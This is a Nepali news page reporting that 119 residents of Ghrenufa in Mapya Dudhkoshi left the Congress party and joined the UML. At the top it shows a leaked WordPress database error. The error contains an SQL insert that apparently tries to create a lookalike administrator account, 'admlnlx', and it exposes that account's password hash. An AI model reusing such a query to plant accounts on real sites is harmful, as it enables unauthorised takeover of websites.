WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bq/w3fu5kfLOSWQtcADF5irLBqjqSW1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 13:06:27', '', 'admlnlx', 'admlnlx')

माप्यदुधकोशी घ्रेनुफका ११९ जना कांग्रेस परित्याग गरि एमालेमा प्रवेश – Gaule Khabar

माप्यदुधकोशी घ्रेनुफका ११९ जना कांग्रेस परित्याग गरि एमालेमा प्रवेश

माप्यदुधकोशी घ्रेनुफका ११९ जना कांग्रेस परित्याग गरि एमालेमा प्रवेश

काठमाण्डौ । माप्यदुधकोशी गाउँपालिका ५ घ्रेनफु तल्लो टोलमा २८ घरको ७८ जना र माथिल्लो टोलका १३ घरका ४१ जना एमाले प्रवेश गरेका छन् ।

बिहिवार आयोजित कार्यक्रममा उनीहरू काँग्रेस परित्याग गरि एमाले प्रवेश गरेका हुन् । नवप्रबेशीहरुलाई गाउँपालिका अध्यक्ष बुद्धिकिरण राईले स्वागत गदै एमालेमा आस्थावान कार्यकर्तालाई धन्यवाद दिइ खादा लगाएर सम्मान गरेका छन् ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका